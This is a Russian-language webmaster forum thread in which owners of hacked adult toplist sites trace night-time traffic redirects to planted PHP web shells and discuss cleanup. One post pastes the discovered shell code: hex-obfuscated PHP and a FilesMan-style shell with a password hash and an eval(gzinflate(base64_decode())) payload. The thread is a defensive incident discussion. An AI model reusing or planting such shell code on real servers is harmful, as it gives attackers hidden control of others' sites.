С нами с 30.10.07
Сообщения: 115
Рейтинг: 132
|
Добавлено: 19/12/10 в 20:21 |
gimcnuk. Тоже на ум приходит такая мысль, находил я на серваке search.php? есть такой в ГБ, так вот он был поменян на saerch.php. Он был изменен apache. Я его удалил (код там вражеский был) Еще бы знать файлы с каким расширением могут быть потенциально опасными
|
|
|
|
С нами с 01.04.07
Сообщения: 4378
Рейтинг: 2970
|
Добавлено: 19/12/10 в 20:35 |
Ну, поиск (в смысле search.php) в топлистах без особой надобности. Его тоже можно удалить.
Попробуй Код: | grep -rl 'кусок_от_эксплоита' /path_to_public_html |
|
|
|
|
С нами с 30.10.07
Сообщения: 115
Рейтинг: 132
|
Добавлено: 19/12/10 в 20:37 |
если установлен бекдор, то ведь логи сервера должны отображать чужие id входы, а нет только мои заходы стоят. Может ходят через мой комп? Аутпост секюрити ничего не перехватывает, троев нет, и не блокирует ничего подозрительного.
|
|
|
|
С нами с 01.04.07
Сообщения: 4378
Рейтинг: 2970
|
Добавлено: 19/12/10 в 21:12 |
Почему чужие? Через дыру влит скрипт, им всё делается. Как раз от имени апача.
|
|
|
|
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
Добавлено: 19/12/10 в 21:30 |
ДА сколько же можно уже?! Чтоб у него хуй отсох (С) У меня щас не отображает количество кликов сделаных от трейдеров все пересмотрел нет ничего что криво настроено. На одном топе пошли показатели хз че делать
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
|
С нами с 30.10.07
Сообщения: 115
Рейтинг: 132
|
Добавлено: 19/12/10 в 22:19 |
нет редирект не проявляется сейчас, он проявляется ночью, параметры редиректа прописаны четко у хакера, ip, браузер, режим времени запуска редиректа. Блять как найти бэкдор?
|
|
|
|
С нами с 30.10.07
Сообщения: 115
Рейтинг: 132
|
Добавлено: 19/12/10 в 22:20 |
траф-то на спосах сразу проседает, значит редиректит
|
|
|
|
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
Добавлено: 19/12/10 в 22:25 |
salo: Я с тобой бро! Что делать БЛЯТЬ!!!!!!!!!!!!!!!!!!!!!!!!! П-А-М-А-Г-И-Т-Е!
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
|
С нами с 01.04.07
Сообщения: 4378
Рейтинг: 2970
|
Добавлено: 19/12/10 в 22:27 |
Я же написал, грепом пройдитесь. Либо визуально, подозрительные файлы, каких не должно быть
|
|
|
|
ASSES AND TITS
С нами с 15.03.03
Сообщения: 4478
Рейтинг: 1816
|
Добавлено: 19/12/10 в 22:39 |
жесть бля какая то творится
парни держитесь !
|
|
|
|
С нами с 30.10.07
Сообщения: 115
Рейтинг: 132
|
Добавлено: 19/12/10 в 22:56 |
нашел какие-то подозрительные EXmain, EXmain2, дожны быть только main, main2. удалил
|
|
|
|
С нами с 30.10.07
Сообщения: 115
Рейтинг: 132
|
Добавлено: 19/12/10 в 22:58 |
но они не php, а html, смотрим дальше
|
|
|
|
С нами с 30.10.07
Сообщения: 115
Рейтинг: 132
|
Добавлено: 19/12/10 в 23:28 |
ну что ребята нашел Web Shell by oRb залит по Ftp, когда блокировка по ip не стояла
/home/имя/domains/domen.com/public_html/transcock/archive/stats/stats.php? От него пошли public_html/stat.php по доменам. Саппорт хоста помог
|
|
|
|
С нами с 30.10.07
Сообщения: 115
Рейтинг: 132
|
Добавлено: 19/12/10 в 23:36 |
Все хакерские файлы php
|
|
|
|
С нами с 06.06.03
Сообщения: 228
Рейтинг: 454
|
Добавлено: 20/12/10 в 00:46 |
И мне саппорт помог.
Четыре вебшелла вычислили...
|
|
|
|
С нами с 06.06.03
Сообщения: 228
Рейтинг: 454
|
Добавлено: 20/12/10 в 08:58 |
Может в ту фарм партнёрку, куда хакер этот болезный там редиректит, заабузить и его акк там прибьют?
|
|
|
|
ябудубудай
С нами с 20.02.07
Сообщения: 722
Рейтинг: 1038
|
Добавлено: 20/12/10 в 09:11 |
Самое интересное я отписывал в тут ПП когда были первые атаки, мне из той партнерки ответили, что вот емейл данного партнера и пишите ему напрямую ))) хотя в сл. атаку надо бы найти, совершенно стороннею машинку и на ней покликать без ативирусника и узнать всего его айди в ПП ;)
|
|
|
|
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
Добавлено: 20/12/10 в 10:00 |
Парни у кого хоститесь? мой сапоорт якобы проверил нихера не ннашел походу и не искали. если что скиньте в личку плиз. спасибо за инфу будем искать
|
|
|
|
С нами с 30.10.07
Сообщения: 115
Рейтинг: 132
|
Добавлено: 20/12/10 в 11:34 |
CrazyMen: отписал в личку
|
|
|
|
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
Добавлено: 20/12/10 в 21:44 |
Друзбя! Нашел я вот что файлы содержались в папке datafiles у всех топо по разному
isp16.php
isp23.php
isp27.php
isp81.php
с кодом
Код: [развернуть] |
<?php ${"G\x4cOBAL\x53"}["\x6e\x6d\x63x\x6a\x6bg\x65\x6f\x79\x6fe"]="a\x75th\x5fpass";${${"\x47\x4cO\x42AL\x53"}["\x6e\x6d\x63\x78jk\x67\x65\x6f\x79o\x65"]}="a\x660\x3209\x65\x36\x3102\x35\x31d4\x355\x616\x36\x65feb\x3840\x38\x376\x31\x33";${"G\x4cO\x42\x41\x4c\x53"}["\x6av\x72f\x6b\x6c\x65\x74o"]="\x64\x65\x66a\x75\x6c\x74_\x61\x63\x74\x69\x6fn";${"\x47L\x4fB\x41\x4c\x53"}["\x78yqc\x63\x78x\x68\x78\x6f\x76"]="\x6f\x6bR\x31\x77\x4b\x74\x6fya\x64\x4cX\x36\x44l\x36\x74\x44\x673W\x78\x56\x78\x46\x6f\x48\x68k\x6a6Y\x6e/x\x63='\x29\x29\x29\x3B","\x2e");
?>
|
Вес файла примерно 56,8кб
usaagent.php
С кодом
Код: [развернуть] |
<?php
$auth_pass = "af0209e610251d455a66efeb84087613"; #root
$color = "#df5";
$default_action = "FilesMan";
$default_charset = "Windows-1251";
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/tq/+jMvqywCvv6P39j8FOaR264O3KnccTazAlD57ZsvQqCke9aVWad+vNwhg/vTo9eBDE+eU7XCftj79oN8fU3Zzpwb/DpxJn0fPhY2eKoh0HoOv1xWS/CiVjJwccKh8EfD2iO4nAWRMtorsqMbK3dZkPHj9ykFvJn7DoDNyxT7o1Grc6e1J+woyBmB8F8OrAlZfLHvfFi7dPd//wN/t+J3Cjygmk3ip0wLmOeHTcMg7AburMgjL3pqFynr97U60ZuXLZ5sh+M7OrRh7dvzUT43CWAyK6m8k2cm6574/bnMZYXexNXgkAyvXd9b+LF5eTjxBl5/e4f8yB2o244nyKQSB64Q2/qlm1ov9PD4yO7yuxmbZMqjU08SucezfplwQmPhvNpH4lgn06PoS+8WeQ70diFHiGW4ECPQj/Yv9kodGeME0UyOcps1tbyevXz6tUX9TIksvuq1s+tmmVc/PdX17VfUNdvEk9P9rRr6ndyon2WHOMK8UfWnGz5cas6G8+69FauVHkafhE3/koI8apAgCADBEYuBo4QqRhLkkJJYtIOBpIc4bmVCjHJNUt6eCg3BAGeLq9x9Gt4uJYexm3ORT3UDtmLVhx5X4qm/OcBsLu8rUirk72Onl5tBjNRCty4s8Uh1VQKxLg+xQC0T93+IV4sxw/c08okR1wKtoyadLX6Dl6tDg3WxVxFoHhkj6Yn/xc='\x29\x29\x29\x3B",".");?>
|
Вес файла 22,7кб
Так же есть во всех топах в папке datafiles файл jsp.php весом примерно 168байт
с кодом
Код: [развернуть] |
<?$a=$_SERVER["HTTP_USER_AGENT"]."aaaaaaaaaa";$jsum=abs(ord($a[0])+ord($a[1])*ord($a[2])+ord($a[3])*ord($a[4])+ord($a[5])-ord($a[6])*ord($a[7])-ord($a[8])*ord($a[9]));?> |
Но наверное это стандартный от скрипта.
Ищи у себя все чтонайдете отпишите!
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
|
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
Добавлено: 20/01/11 в 22:58 |
Короче опять... Уже в папке темплейтс фаил _foot.phtml содержимое одинаковое что и у других. Сука я из за него не могу сетку геев поднять блять! Зашел топ проверить а там кликов 0 у всех пиздец приплыли думаю. Проверил так и есть опять то же
|
|
Payoneer-Бесплатная карта, быстрый вывод, низкие тарифы!|VDS
|
0
|
|
|
С нами с 29.07.03
Сообщения: 682
Рейтинг: 440
|
Добавлено: 21/01/11 в 01:07 |
Народ, че вы так паритесь со скриптом который ломают через день, грубо говоря. Попробуйте поюзать для топ трейда смартсж, вполне мощный скрипт, много статсов, мультиадминка.
Два -три -5 мастеров отпишите автору в асю что хотите импорт трейдеров с гбтоп, он это спецом для вас сделает, и перенос не составит проблем.
|
|
|
|
ябудубудай
С нами с 20.02.07
Сообщения: 722
Рейтинг: 1038
|
Добавлено: 21/01/11 в 08:18 |
CrazyMen - на топах которые перевел на новый хост??? (появился код?)
Bruno - Попробывал поставить смарт, а там оказывается не так просто залил и через фтп клиент и через браузер установил, там надо через шел и т.д. не так все просто! ;)
|
|
|
|
На пенсии
С нами с 10.12.06
Сообщения: 4659
Рейтинг: 2370
|
Добавлено: 21/01/11 в 13:40 |
Нет. На новый сервер не переезжал. Каким образом он закидывает я не знаю. Но все в одно время закинуты. Имена почти разные файлов.
|
|
|
|
С нами с 29.07.03
Сообщения: 682
Рейтинг: 440
|
Добавлено: 21/01/11 в 14:02 |
Дольчик ххх писал: | CrazyMen - на топах которые перевел на новый хост??? (появился код?)
Bruno - Попробывал поставить смарт, а там оказывается не так просто залил и через фтп клиент и через браузер установил, там надо через шел и т.д. не так все просто! ;) |
Поставить то его как раз и не проблема. Шел - разве проблема счас? Делаешь по мануалу и скрипт ставится. А вот когда поставишь, настраивать его, там море фич, там уже посложнее.
|
|
|
|